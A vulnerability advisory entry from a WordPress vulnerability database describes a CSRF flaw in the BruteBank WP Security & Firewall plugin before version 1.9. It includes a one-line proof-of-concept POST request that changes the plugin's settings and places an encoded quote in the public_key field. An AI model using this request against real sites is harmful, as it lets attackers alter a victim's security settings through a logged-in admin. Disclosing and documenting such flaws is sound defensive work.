Lucene search

K
wpvulndbRezadutyWPVDB-ID:1E621D62-13C7-4B2F-96CA-3617A796D037
HistoryDec 28, 2022 - 12:00 a.m.

BruteBank - WP Security & Firewall < 1.9 - Settings Update via CSRF

2022-12-2800:00:00
rezaduty
wpscan.com
9
brutebank
csrf protection
settings update
security vulnerability

EPSS

0.001

Percentile

34.5%

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.

PoC

POST /wp-admin/admin.php?page=brutebank-settings HTTP/1.1 public_key=site.a%22%2522aaaa%3Daaa&secret;_key=aaa&update;=Update

EPSS

0.001

Percentile

34.5%

Related for WPVDB-ID:1E621D62-13C7-4B2F-96CA-3617A796D037